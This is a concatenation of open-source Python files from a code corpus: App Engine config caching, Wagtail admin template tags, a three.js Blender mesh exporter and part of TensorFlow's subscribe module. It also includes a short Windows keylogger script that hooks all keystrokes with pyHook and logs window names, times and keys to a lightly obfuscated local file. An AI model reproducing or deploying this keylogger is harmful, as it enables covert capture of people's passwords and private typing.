"""Update the local config cache from memcache/datastore.
Normally configuration parameters are only refreshed at the start of a
new request. If you have a very long running request, or you just need
the freshest data for some reason, you can call this function to force
a refresh.
"""
app_version, _, _ = _inspect_environment()
global _cached_config
new_config = _fetch_latest_from_memcache(app_version)
if not new_config:
new_config = _fetch_latest_from_datastore(app_version)
if new_config:
_cached_config = new_config
def _new_request():
"""Test if this is the first call to this function in the current request.
This function will return True exactly once for each request
Subsequent calls in the same request will return False.
Returns:
True if this is the first call in a given request, False otherwise.
"""
if RESERVED_MARKER in os.environ:
return False
os.environ[RESERVED_MARKER] = RESERVED_MARKER
return True
def _get_config():
"""Check if the current cached config is stale, and if so update it."""
app_version, current_config_version, development = _inspect_environment()
global _cached_config
if (development and _new_request()) or not _cached_config:
_cached_config = _fetch_from_local_file() or Config()
if _cached_config.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_memcache(app_version)
if not newconfig or newconfig.ah__conf__version < current_config_version:
newconfig = _fetch_latest_from_datastore(app_version)
_cached_config = newconfig or _cached_config
return _cached_config
def get(name, default=None):
"""Get the value of a configuration parameter.
This function is guaranteed to return the same value for every call
during a single request.
Args:
name: The name of the configuration parameter you want a value for.
default: A default value to return if the named parameter doesn't exist.
Returns:
The string value of the configuration parameter.
"""
return getattr(_get_config(), name, default)
def get_all():
"""Return an object with an attribute for each conf parameter.
Returns:
An object with an attribute for each conf parameter.
"""
return _get_config()
|
bsd-2-clause
|
timorieber/wagtail
|
wagtail/contrib/modeladmin/templatetags/modeladmin_tags.py
|
5
|
6591
|
import datetime
from django.contrib.admin.templatetags.admin_list import ResultList, result_headers
from django.contrib.admin.utils import display_for_field, display_for_value, lookup_field
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.forms.utils import flatatt
from django.template import Library
from django.template.loader import get_template
from django.utils.encoding import force_str
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
register = Library()
def items_for_result(view, result):
"""
Generates the actual list of data.
"""
modeladmin = view.model_admin
for field_name in view.list_display:
empty_value_display = modeladmin.get_empty_value_display(field_name)
row_classes = ['field-%s' % field_name]
try:
f, attr, value = lookup_field(field_name, result, modeladmin)
except ObjectDoesNotExist:
result_repr = empty_value_display
else:
empty_value_display = getattr(
attr, 'empty_value_display', empty_value_display)
if f is None or f.auto_created:
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean or not value:
allow_tags = True
result_repr = display_for_value(
value, empty_value_display, boolean)
# Strip HTML tags in the resulting text, except if the
# function has an "allow_tags" attribute set to True.
if allow_tags:
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_classes.append('nowrap')
else:
if isinstance(f, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = empty_value_display
else:
result_repr = field_val
else:
result_repr = display_for_field(
value, f, empty_value_display)
if isinstance(f, (
models.DateField, models.TimeField, models.ForeignKey)
):
row_classes.append('nowrap')
if force_str(result_repr) == '':
result_repr = mark_safe(' ')
row_classes.extend(
modeladmin.get_extra_class_names_for_field_col(result, field_name)
)
row_attrs = modeladmin.get_extra_attrs_for_field_col(result, field_name)
row_attrs['class'] = ' ' . join(row_classes)
row_attrs_flat = flatatt(row_attrs)
yield format_html('<td{}>{}</td>', row_attrs_flat, result_repr)
def results(view, object_list):
for item in object_list:
yield ResultList(None, items_for_result(view, item))
@register.inclusion_tag("modeladmin/includes/result_list.html",
takes_context=True)
def result_list(context):
"""
Displays the headers and data list together
"""
view = context['view']
object_list = context['object_list']
headers = list(result_headers(view))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
context.update({
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(view, object_list))})
return context
@register.simple_tag
def pagination_link_previous(current_page, view):
if current_page.has_previous():
previous_page_number0 = current_page.previous_page_number() - 1
return format_html(
'<li class="prev"><a href="%s" class="icon icon-arrow-left">%s'
'</a></li>' %
(view.get_query_string({view.PAGE_VAR: previous_page_number0}),
_('Previous'))
)
return ''
@register.simple_tag
def pagination_link_next(current_page, view):
if current_page.has_next():
next_page_number0 = current_page.next_page_number() - 1
return format_html(
'<li class="next"><a href="%s" class="icon icon-arrow-right-after"'
'>%s</a></li>' %
(view.get_query_string({view.PAGE_VAR: next_page_number0}),
_('Next'))
)
return ''
@register.inclusion_tag(
"modeladmin/includes/search_form.html", takes_context=True)
def search_form(context):
context.update({'search_var': context['view'].SEARCH_VAR})
return context
@register.simple_tag
def admin_list_filter(view, spec):
template_name = spec.template
if template_name == 'admin/filter.html':
template_name = 'modeladmin/includes/filter.html'
tpl = get_template(template_name)
return tpl.render({
'title': spec.title,
'choices': list(spec.choices(view)),
'spec': spec,
})
@register.inclusion_tag(
"modeladmin/includes/result_row.html", takes_context=True)
def result_row_display(context, index):
obj = context['object_list'][index]
view = context['view']
row_attrs_dict = view.model_admin.get_extra_attrs_for_row(obj, context)
row_attrs_dict['data-object-pk'] = obj.pk
odd_or_even = 'odd' if (index % 2 == 0) else 'even'
if 'class' in row_attrs_dict:
row_attrs_dict['class'] += ' %s' % odd_or_even
else:
row_attrs_dict['class'] = odd_or_even
context.update({
'obj': obj,
'row_attrs': mark_safe(flatatt(row_attrs_dict)),
'action_buttons': view.get_buttons_for_obj(obj),
})
return context
@register.inclusion_tag(
"modeladmin/includes/result_row_value.html", takes_context=True)
def result_row_value_display(context, index):
add_action_buttons = False
item = context['item']
closing_tag = mark_safe(item[-5:])
request = context['request']
model_admin = context['view'].model_admin
field_name = model_admin.get_list_display(request)[index]
if field_name == model_admin.get_list_display_add_buttons(request):
add_action_buttons = True
item = mark_safe(item[0:-5])
context.update({
'item': item,
'add_action_buttons': add_action_buttons,
'closing_tag': closing_tag,
})
return context
@register.filter
def get_content_type_for_obj(obj):
return obj.__class__._meta.verbose_name
|
bsd-3-clause
|
cyankw/keyboard_recorder
|
Beta Testing Version/py-hook V2.py
|
2
|
1695
|
# -*- coding: utf-8 -*- #
__author__ = 'cyankw'
import pythoncom
import pyHook
import datetime
import urllib, base64
from multiprocessing import Pool
kll=[]
kll2=[]
oldname = ''
def onKeyboardEvent(event):
# 监听键盘事件
timeNow = datetime.datetime.now()
Now = timeNow.strftime('%H:%M:%S')
wrfile = open(r'd://install22.txt', 'a')
evtname = event.WindowName
global oldname
NAME = "WindowName:%s\n" % event.WindowName
TIME="Time:%s\n" % datetime.datetime.now()
KEY=" Key:%s-%s \n" % (event.Key, Now)
LINE="---------\n"
NAME=base64.encodestring(urllib.quote(NAME))
TIME=base64.encodestring(urllib.quote(TIME))
KEY=base64.encodestring(urllib.quote(KEY))
LINE=base64.encodestring(urllib.quote(LINE))
NAME = NAME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
KEY = KEY.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
TIME = TIME.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
LINE = LINE.replace(",", "%$6rd)").replace("=\n", "%128)").replace("CU", "%7qw(")
while evtname != oldname:
wrfile.write(LINE)
wrfile.write(NAME)
wrfile.write(TIME)
oldname = event.WindowName
print LINE
print NAME
print TIME
wrfile.write(KEY)
print KEY
return True
def main():
# 创建一个“钩子”管理对象
hm = pyHook.HookManager()
# 监听所有键盘事件
hm.KeyDown = onKeyboardEvent
# 设置键盘“钩子”
hm.HookKeyboard()
pythoncom.PumpMessages()
if __name__ == "__main__":
p = Pool(processes=8)
main()
p.close()
p.join()
|
apache-2.0
|
ryangibbs/tosser
|
three.js/utils/exporters/blender/addons/io_three/exporter/api/mesh.py
|
124
|
23228
|
"""
Blender API for querying mesh data. Animation data is also
handled here since Three.js associates the animation (skeletal,
morph targets) with the geometry nodes.
"""
import operator
from bpy import data, types, context
from . import material, texture, animation
from . import object as object_
from .. import constants, utilities, logger, exceptions
def _mesh(func):
"""
:param func:
"""
def inner(name, *args, **kwargs):
"""
:param name:
:param *args:
:param **kwargs:
"""
if isinstance(name, types.Mesh):
mesh = name
else:
mesh = data.meshes[name]
return func(mesh, *args, **kwargs)
return inner
@_mesh
def skeletal_animation(mesh, options):
"""
:param mesh:
:param options:
:rtype: []
"""
logger.debug("mesh.animation(%s, %s)", mesh, options)
armature = _armature(mesh)
if not armature:
logger.warning("No armature found (%s)", mesh)
return []
anim_type = options.get(constants.ANIMATION)
# pose_position = armature.data.pose_position
dispatch = {
constants.POSE: animation.pose_animation,
constants.REST: animation.rest_animation
}
func = dispatch[anim_type]
# armature.data.pose_position = anim_type.upper()
animations = func(armature, options)
# armature.data.pose_position = pose_position
return animations
@_mesh
def bones(mesh, options):
"""
:param mesh:
:param options:
:rtype: [], {}
"""
logger.debug("mesh.bones(%s)", mesh)
armature = _armature(mesh)
if not armature:
return [], {}
anim_type = options.get(constants.ANIMATION)
# pose_position = armature.data.pose_position
if anim_type == constants.OFF:
logger.info("Animation type not set, defaulting "
"to using REST position for the armature.")
func = _rest_bones
# armature.data.pose_position = "REST"
else:
dispatch = {
constants.REST: _rest_bones,
constants.POSE: _pose_bones
}
logger.info("Using %s for the armature", anim_type)
func = dispatch[anim_type]
# armature.data.pose_position = anim_type.upper()
bones_, bone_map = func(armature)
# armature.data.pose_position = pose_position
return (bones_, bone_map)
@_mesh
def buffer_normal(mesh):
"""
:param mesh:
:rtype: []
"""
normals_ = []
for face in mesh.tessfaces:
vert_count = len(face.vertices)
if vert_count is not 3:
msg = "Non-triangulated face detected"
raise exceptions.BufferGeometryError(msg)
for vertex_index in face.vertices:
normal = mesh.vertices[vertex_index].normal
vector = (normal.x, normal.y, normal.z)
normals_.extend(vector)
return normals_
@_mesh
def buffer_position(mesh):
"""
:param mesh:
:rtype: []
"""
position = []
for face in mesh.tessfaces:
vert_count = len(face.vertices)
if vert_count is not 3:
msg = "Non-triangulated face detected"
raise exceptions.BufferGeometryError(msg)
for vertex_index in face.vertices:
vertex = mesh.vertices[vertex_index]
vector = (vertex.co.x, vertex.co.y, vertex.co.z)
position.extend(vector)
return position
@_mesh
def buffer_uv(mesh):
"""
:param mesh:
:rtype: []
"""
uvs_ = []
if len(mesh.uv_layers) is 0:
return uvs_
elif len(mesh.uv_layers) > 1:
# if memory serves me correctly buffer geometry
# only uses one UV layer
logger.warning("%s has more than 1 UV layer", mesh.name)
for uv_data in mesh.uv_layers[0].data:
uv_tuple = (uv_data.uv[0], uv_data.uv[1])
uvs_.extend(uv_tuple)
return uvs_
@_mesh
def faces(mesh, options):
"""
:param mesh:
:param options:
"""
logger.debug("mesh.faces(%s, %s)", mesh, options)
vertex_uv = len(mesh.uv_textures) > 0
has_colors = len(mesh.vertex_colors) > 0
logger.info("Has UVs = %s", vertex_uv)
logger.info("Has vertex colours = %s", has_colors)
opt_colours = options[constants.COLORS] and has_colors
opt_uvs = options[constants.UVS] and vertex_uv
opt_materials = options.get(constants.FACE_MATERIALS)
opt_normals = options[constants.NORMALS]
logger.debug("Vertex colours enabled = %s", opt_colours)
logger.debug("UVS enabled = %s", opt_uvs)
logger.debug("Materials enabled = %s", opt_materials)
logger.debug("Normals enabled = %s", opt_normals)
uv_layers = _uvs(mesh) if opt_uvs else None
vertex_normals = _normals(mesh) if opt_normals else None
vertex_colours = vertex_colors(mesh) if opt_colours else None
faces_data = []
colour_indices = {}
if vertex_colours:
logger.debug("Indexing colours")
for index, colour in enumerate(vertex_colours):
colour_indices[str(colour)] = index
normal_indices = {}
if vertex_normals:
logger.debug("Indexing normals")
for index, normal in enumerate(vertex_normals):
normal_indices[str(normal)] = index
logger.info("Parsing %d faces", len(mesh.tessfaces))
for face in mesh.tessfaces:
vert_count = len(face.vertices)
if vert_count not in (3, 4):
logger.error("%d vertices for face %d detected",
vert_count,
face.index)
raise exceptions.NGonError("ngons are not supported")
mat_index = face.material_index is not None and opt_materials
mask = {
constants.QUAD: vert_count is 4,
constants.MATERIALS: mat_index,
constants.UVS: False,
constants.NORMALS: False,
constants.COLORS: False
}
face_data = []
face_data.extend([v for v in face.vertices])
if mask[constants.MATERIALS]:
face_data.append(face.material_index)
# @TODO: this needs the same optimization as what
# was done for colours and normals
if uv_layers:
for index, uv_layer in enumerate(uv_layers):
layer = mesh.tessface_uv_textures[index]
for uv_data in layer.data[face.index].uv:
uv_tuple = (uv_data[0], uv_data[1])
face_data.append(uv_layer.index(uv_tuple))
mask[constants.UVS] = True
if vertex_normals:
for vertex in face.vertices:
normal = mesh.vertices[vertex].normal
normal = (normal.x, normal.y, normal.z)
face_data.append(normal_indices[str(normal)])
mask[constants.NORMALS] = True
if vertex_colours:
colours = mesh.tessface_vertex_colors.active.data[face.index]
for each in (colours.color1, colours.color2, colours.color3):
each = utilities.rgb2int(each)
face_data.append(colour_indices[str(each)])
mask[constants.COLORS] = True
if mask[constants.QUAD]:
colour = utilities.rgb2int(colours.color4)
face_data.append(colour_indices[str(colour)])
face_data.insert(0, utilities.bit_mask(mask))
faces_data.extend(face_data)
return faces_data
@_mesh
def morph_targets(mesh, options):
"""
:param mesh:
:param options:
"""
logger.debug("mesh.morph_targets(%s, %s)", mesh, options)
obj = object_.objects_using_mesh(mesh)[0]
original_frame = context.scene.frame_current
frame_step = options.get(constants.FRAME_STEP, 1)
scene_frames = range(context.scene.frame_start,
context.scene.frame_end+1,
frame_step)
morphs = []
for frame in scene_frames:
logger.info("Processing data at frame %d", frame)
context.scene.frame_set(frame, 0.0)
morphs.append([])
vertices_ = object_.extract_mesh(obj, options).vertices[:]
for vertex in vertices_:
morphs[-1].extend([vertex.co.x, vertex.co.y, vertex.co.z])
context.scene.frame_set(original_frame, 0.0)
morphs_detected = False
for index, each in enumerate(morphs):
if index is 0:
continue
morphs_detected = morphs[index-1] != each
if morphs_detected:
logger.info("Valid morph target data detected")
break
else:
logger.info("No valid morph data detected")
return []
manifest = []
for index, morph in enumerate(morphs):
manifest.append({
constants.NAME: 'animation_%06d' % index,
constants.VERTICES: morph
})
return manifest
@_mesh
def materials(mesh, options):
"""
:param mesh:
:param options:
"""
logger.debug("mesh.materials(%s, %s)", mesh, options)
indices = set([face.material_index for face in mesh.tessfaces])
material_sets = [(mesh.materials[index], index) for index in indices]
materials_ = []
maps = options.get(constants.MAPS)
mix = options.get(constants.MIX_COLORS)
use_colors = options.get(constants.COLORS)
logger.info("Colour mix is set to %s", mix)
logger.info("Vertex colours set to %s", use_colors)
for mat, index in material_sets:
try:
dbg_color = constants.DBG_COLORS[index]
except IndexError:
dbg_color = constants.DBG_COLORS[0]
logger.info("Compiling attributes for %s", mat.name)
attributes = {
constants.COLOR_AMBIENT: material.ambient_color(mat),
constants.COLOR_EMISSIVE: material.emissive_color(mat),
constants.SHADING: material.shading(mat),
constants.OPACITY: material.opacity(mat),
constants.TRANSPARENT: material.transparent(mat),
constants.VISIBLE: material.visible(mat),
constants.WIREFRAME: material.wireframe(mat),
constants.BLENDING: material.blending(mat),
constants.DEPTH_TEST: material.depth_test(mat),
constants.DEPTH_WRITE: material.depth_write(mat),
constants.DBG_NAME: mat.name,
constants.DBG_COLOR: dbg_color,
constants.DBG_INDEX: index
}
if use_colors:
colors = material.use_vertex_colors(mat)
attributes[constants.VERTEX_COLORS] = colors
if (use_colors and mix) or (not use_colors):
colors = material.diffuse_color(mat)
attributes[constants.COLOR_DIFFUSE] = colors
if attributes[constants.SHADING] == constants.PHONG:
logger.info("Adding specular attributes")
attributes.update({
constants.SPECULAR_COEF: material.specular_coef(mat),
constants.COLOR_SPECULAR: material.specular_color(mat)
})
if mesh.show_double_sided:
logger.info("Double sided is on")
attributes[constants.DOUBLE_SIDED] = True
materials_.append(attributes)
if not maps:
continue
diffuse = _diffuse_map(mat)
if diffuse:
logger.info("Diffuse map found")
attributes.update(diffuse)
light = _light_map(mat)
if light:
logger.info("Light map found")
attributes.update(light)
specular = _specular_map(mat)
if specular:
logger.info("Specular map found")
attributes.update(specular)
if attributes[constants.SHADING] == constants.PHONG:
normal = _normal_map(mat)
if normal:
logger.info("Normal map found")
attributes.update(normal)
bump = _bump_map(mat)
if bump:
logger.info("Bump map found")
attributes.update(bump)
return materials_
@_mesh
def normals(mesh):
"""
:param mesh:
:rtype: []
"""
logger.debug("mesh.normals(%s)", mesh)
normal_vectors = []
for vector in _normals(mesh):
normal_vectors.extend(vector)
return normal_vectors
@_mesh
def skin_weights(mesh, bone_map, influences):
"""
:param mesh:
:param bone_map:
:param influences:
"""
logger.debug("mesh.skin_weights(%s)", mesh)
return _skinning_data(mesh, bone_map, influences, 1)
@_mesh
def skin_indices(mesh, bone_map, influences):
"""
:param mesh:
:param bone_map:
:param influences:
"""
logger.debug("mesh.skin_indices(%s)", mesh)
return _skinning_data(mesh, bone_map, influences, 0)
@_mesh
def texture_registration(mesh):
"""
:param mesh:
"""
logger.debug("mesh.texture_registration(%s)", mesh)
materials_ = mesh.materials or []
registration = {}
funcs = (
(constants.MAP_DIFFUSE, material.diffuse_map),
(constants.SPECULAR_MAP, material.specular_map),
(constants.LIGHT_MAP, material.light_map),
(constants.BUMP_MAP, material.bump_map),
(constants.NORMAL_MAP, material.normal_map)
)
def _registration(file_path, file_name):
"""
:param file_path:
:param file_name:
"""
return {
'file_path': file_path,
'file_name': file_name,
'maps': []
}
logger.info("found %d materials", len(materials_))
for mat in materials_:
for (key, func) in funcs:
tex = func(mat)
if tex is None:
continue
logger.info("%s has texture %s", key, tex.name)
file_path = texture.file_path(tex)
file_name = texture.file_name(tex)
reg = registration.setdefault(
utilities.hash(file_path),
_registration(file_path, file_name))
reg["maps"].append(key)
return registration
@_mesh
def uvs(mesh):
"""
:param mesh:
:rtype: []
"""
logger.debug("mesh.uvs(%s)", mesh)
uvs_ = []
for layer in _uvs(mesh):
uvs_.append([])
logger.info("Parsing UV layer %d", len(uvs_))
for pair in layer:
uvs_[-1].extend(pair)
return uvs_
@_mesh
def vertex_colors(mesh):
"""
:param mesh:
"""
logger.debug("mesh.vertex_colors(%s)", mesh)
vertex_colours = []
try:
vertex_colour = mesh.tessface_vertex_colors.active.data
except AttributeError:
logger.info("No vertex colours found")
return
for face in mesh.tessfaces:
colours = (vertex_colour[face.index].color1,
vertex_colour[face.index].color2,
vertex_colour[face.index].color3,
vertex_colour[face.index].color4)
for colour in colours:
colour = utilities.rgb2int((colour.r, colour.g, colour.b))
if colour not in vertex_colours:
vertex_colours.append(colour)
return vertex_colours
@_mesh
def vertices(mesh):
"""
:param mesh:
:rtype: []
"""
logger.debug("mesh.vertices(%s)", mesh)
vertices_ = []
for vertex in mesh.vertices:
vertices_.extend((vertex.co.x, vertex.co.y, vertex.co.z))
return vertices_
def _normal_map(mat):
"""
:param mat:
"""
tex = material.normal_map(mat)
if tex is None:
return
logger.info("Found normal texture map %s", tex.name)
normal = {
constants.MAP_NORMAL:
texture.file_name(tex),
constants.MAP_NORMAL_FACTOR:
material.normal_scale(mat),
constants.MAP_NORMAL_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_NORMAL_WRAP: texture.wrap(tex),
constants.MAP_NORMAL_REPEAT: texture.repeat(tex)
}
return normal
def _bump_map(mat):
"""
:param mat:
"""
tex = material.bump_map(mat)
if tex is None:
return
logger.info("Found bump texture map %s", tex.name)
bump = {
constants.MAP_BUMP:
texture.file_name(tex),
constants.MAP_BUMP_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_BUMP_WRAP: texture.wrap(tex),
constants.MAP_BUMP_REPEAT: texture.repeat(tex),
constants.MAP_BUMP_SCALE:
material.bump_scale(mat),
}
return bump
def _specular_map(mat):
"""
:param mat:
"""
tex = material.specular_map(mat)
if tex is None:
return
logger.info("Found specular texture map %s", tex.name)
specular = {
constants.MAP_SPECULAR:
texture.file_name(tex),
constants.MAP_SPECULAR_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_SPECULAR_WRAP: texture.wrap(tex),
constants.MAP_SPECULAR_REPEAT: texture.repeat(tex)
}
return specular
def _light_map(mat):
"""
:param mat:
"""
tex = material.light_map(mat)
if tex is None:
return
logger.info("Found light texture map %s", tex.name)
light = {
constants.MAP_LIGHT:
texture.file_name(tex),
constants.MAP_LIGHT_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_LIGHT_WRAP: texture.wrap(tex),
constants.MAP_LIGHT_REPEAT: texture.repeat(tex)
}
return light
def _diffuse_map(mat):
"""
:param mat:
"""
tex = material.diffuse_map(mat)
if tex is None:
return
logger.info("Found diffuse texture map %s", tex.name)
diffuse = {
constants.MAP_DIFFUSE:
texture.file_name(tex),
constants.MAP_DIFFUSE_ANISOTROPY:
texture.anisotropy(tex),
constants.MAP_DIFFUSE_WRAP: texture.wrap(tex),
constants.MAP_DIFFUSE_REPEAT: texture.repeat(tex)
}
return diffuse
def _normals(mesh):
"""
:param mesh:
:rtype: []
"""
vectors = []
vectors_ = {}
for face in mesh.tessfaces:
for vertex_index in face.vertices:
normal = mesh.vertices[vertex_index].normal
vector = (normal.x, normal.y, normal.z)
str_vec = str(vector)
try:
vectors_[str_vec]
except KeyError:
vectors.append(vector)
vectors_[str_vec] = True
return vectors
def _uvs(mesh):
"""
:param mesh:
"""
uv_layers = []
for layer in mesh.uv_layers:
uv_layers.append([])
for uv_data in layer.data:
uv_tuple = (uv_data.uv[0], uv_data.uv[1])
if uv_tuple not in uv_layers[-1]:
uv_layers[-1].append(uv_tuple)
return uv_layers
def _armature(mesh):
"""
:param mesh:
"""
obj = object_.objects_using_mesh(mesh)[0]
armature = obj.find_armature()
if armature:
logger.info("Found armature %s for %s", armature.name, obj.name)
else:
logger.info("Found no armature for %s", obj.name)
return armature
def _skinning_data(mesh, bone_map, influences, array_index):
"""
:param mesh:
:param bone_map:
:param influences:
:param array_index:
"""
armature = _armature(mesh)
manifest = []
if not armature:
return manifest
obj = object_.objects_using_mesh(mesh)[0]
logger.debug("Skinned object found %s", obj.name)
for vertex in mesh.vertices:
bone_array = []
for group in vertex.groups:
bone_array.append((group.group, group.weight))
bone_array.sort(key=operator.itemgetter(1), reverse=True)
for index in range(influences):
if index >= len(bone_array):
manifest.append(0)
continue
name = obj.vertex_groups[bone_array[index][0]].name
for bone_index, bone in enumerate(armature.pose.bones):
if bone.name != name:
continue
if array_index is 0:
entry = bone_map.get(bone_index, -1)
else:
entry = bone_array[index][1]
manifest.append(entry)
break
else:
manifest.append(0)
return manifest
def _pose_bones(armature):
"""
:param armature:
:rtype: [], {}
"""
bones_ = []
bone_map = {}
bone_count = 0
armature_matrix = armature.matrix_world
for bone_count, pose_bone in enumerate(armature.pose.bones):
armature_bone = pose_bone.bone
bone_index = None
if armature_bone.parent is None:
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_index = -1
else:
parent_bone = armature_bone.parent
parent_matrix = armature_matrix * parent_bone.matrix_local
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_matrix = parent_matrix.inverted() * bone_matrix
bone_index = index = 0
for pose_parent in armature.pose.bones:
armature_parent = pose_parent.bone.name
if armature_parent == parent_bone.name:
bone_index = index
index += 1
bone_map[bone_count] = bone_count
pos, rot, scl = bone_matrix.decompose()
bones_.append({
constants.PARENT: bone_index,
constants.NAME: armature_bone.name,
constants.POS: (pos.x, pos.z, -pos.y),
constants.ROTQ: (rot.x, rot.z, -rot.y, rot.w),
constants.SCL: (scl.x, scl.z, scl.y)
})
return bones_, bone_map
def _rest_bones(armature):
"""
:param armature:
:rtype: [], {}
"""
bones_ = []
bone_map = {}
bone_count = 0
bone_index_rel = 0
for bone in armature.data.bones:
logger.info("Parsing bone %s", bone.name)
if not bone.use_deform:
logger.debug("Ignoring bone %s at: %d",
bone.name, bone_index_rel)
continue
if bone.parent is None:
bone_pos = bone.head_local
bone_index = -1
else:
bone_pos = bone.head_local - bone.parent.head_local
bone_index = 0
index = 0
for parent in armature.data.bones:
if parent.name == bone.parent.name:
bone_index = bone_map.get(index)
index += 1
bone_world_pos = armature.matrix_world * bone_pos
x_axis = bone_world_pos.x
y_axis = bone_world_pos.z
z_axis = -bone_world_pos.y
logger.debug("Adding bone %s at: %s, %s",
bone.name, bone_index, bone_index_rel)
bone_map[bone_count] = bone_index_rel
bone_index_rel += 1
# @TODO: the rotq probably should not have these
# hard coded values
bones_.append({
constants.PARENT: bone_index,
constants.NAME: bone.name,
constants.POS: (x_axis, y_axis, z_axis),
constants.ROTQ: (0, 0, 0, 1)
})
bone_count += 1
return (bones_, bone_map)
|
mit
|
chenjun0210/tensorflow
|
tensorflow/python/framework/subscribe.py
|
16
|
11056
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Subscribe function."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
def _recursive_apply(tensors, apply_fn):
"""Helper method to recursively apply a function to structure of tensors.
The structure of the tensors should take the form similar to fetches in
`tf.Session` and includes single `Tensor`, `list`, nested `list`, `tuple`,
`namedtuple`, or `dict`.
Args:
tensors: Single `Tensor`, `list`, nested `list, `tuple`,
`namedtuple`, or `dict`.
apply_fn: Function to apply to each `Tensor` and should return a `Tensor`.
Returns:
Returns the modified tensors with the same structure.
Raises:
`TypeError` if undefined type in the tensors structure.
"""
tensors_type = type(tensors)
if tensors_type is ops.Tensor:
return apply_fn(tensors)
elif tensors_type is variables.Variable:
return apply_fn(tensors.value())
elif isinstance(tensors, (list, tuple)):
tensors = [_recursive_apply(t, apply_fn) for t in tensors]
if tensors_type is list:
return list(tensors)
elif tensors_type is tuple:
return tuple(tensors)
return tensors_type(*tensors) # collections.namedtuple
elif tensors_type is dict:
return dict([(k, _recursive_apply(v, apply_fn))
for k, v in tensors.items()])
else:
raise TypeError('_recursive_apply argument %r has invalid type %r' %
(tensors, tensors_type))
class _ControlOutputCache(object):
"""Helper class to manage calculating and caching control_outputs in graph."""
def __init__(self):
self.cache = {}
def calc_control_outputs(self, graph):
"""Returns the map of control_outputs for a given graph.
Args:
graph: The graph to parse.
Returns:
A map of the control outputs.
"""
control_outputs = {}
for op in graph.get_operations():
for control_input in op.control_inputs:
if control_input not in control_outputs:
control_outputs[control_input] = set()
control_outputs[control_input].add(op)
return control_outputs
def get_control_outputs(self, op):
"""Return the control outputs for a given op.
Args:
op: The op to fetch control outputs for.
Returns:
Iterable of control output ops.
"""
if op.graph not in self.cache:
control_outputs = self.calc_control_outputs(op.graph)
self.cache[op.graph] = control_outputs
else:
control_outputs = self.cache[op.graph]
return control_outputs.get(op, [])
def _subscribe_new(tensor, side_effects, control_cache):
"""Helper method that subscribes a single tensor to a list of side_effects.
Args:
tensor: `tf.Tensor`
side_effects: List of side_effect functions see subscribe for details.
control_cache: `_ControlOutputCache` helper to get control_outputs faster.
Returns:
The modified replacement to the passed in tensor which triggers the side
effects.
"""
update_input = []
for consumer_op in list(tensor.consumers()): # explicit copy
update_input.append((consumer_op, list(consumer_op.inputs).index(tensor)))
update_control_input = control_cache.get_control_outputs(tensor.op)
# Trailing slash on name scope to replace the scope.
name_scope = tensor.op.name + '/subscription/'
with ops.name_scope(name_scope):
outs = []
for s in side_effects:
outs += s(tensor)
with ops.control_dependencies(outs):
out = array_ops.identity(tensor)
for consumer_op, index in update_input:
consumer_op._update_input(index, out) # pylint: disable=protected-access
for consumer_op in update_control_input:
consumer_op._control_inputs.remove(tensor.op) # pylint: disable=protected-access
consumer_op._control_inputs.append(out.op) # pylint: disable=protected-access
consumer_op._recompute_node_def() # pylint: disable=protected-access
return out
def _subscribe_extend(tensor, side_effects):
"""Helper method to extend the list of side_effects for a subscribed tensor.
Args:
tensor: A `tf.Tensor` as returned by subscribe().
side_effects: List of side_effect functions, see subscribe for details.
Returns:
The given subscribed tensor (for API consistency).
"""
assert len(tensor.op.inputs) == 1, 'Op {} must only have one input'.format(
tensor.op.name)
source_tensor = tensor.op.inputs[0]
# Build the side effect graphs and add their outputs to the list of control
# dependencies for the subscribed tensor.
outs = []
name_scope = source_tensor.op.name + '/subscription/'
with ops.name_scope(name_scope):
for s in side_effects:
outs += s(source_tensor)
for out in outs:
out_type = type(out)
if out_type is ops.Tensor:
out = out.op
tensor.op._control_inputs.append(out) # pylint: disable=protected-access
tensor.op._recompute_node_def() # pylint: disable=protected-access
return tensor
def _is_subscribed_identity(tensor):
"""Checks if the given tensor is an identity op returned by `subscribe()`.
Args:
tensor: A `tf.Tensor` to check.
Returns:
True if the given tensor matches the criteria for subscription identies:
its op type is `Identity`, its name matches the name of its input and
conforms to the convention for subscribed nodes.
False otherwise.
"""
# Subscribed tensor are assumed to be identity ops.
if tensor.op.type != 'Identity':
return False
# Check that the tensor name matches the convention in place for identity ops
# created by subscribe().
match = re.match(
r'(?P<prefix_name>^.*?)/subscription/Identity[^/]+', tensor.name)
if match is None or len(match.groups()) != 1:
return False
prefix_name = match.group('prefix_name')
# Get a reference to the source tensor and check that it has a matching name.
assert len(tensor.op.inputs) == 1, 'Op {} must only have one input'.format(
tensor.op.name)
source_tensor = tensor.op.inputs[0]
if prefix_name != source_tensor.op.name:
return False
return True
def _subscribe(tensor, side_effects, control_cache):
"""Helper method that subscribes a single tensor to a list of side_effects.
This method will check if the given tensor has already been subscribed or if
it's a tensor returned by a previous call to `subscribe()` and, if so, will
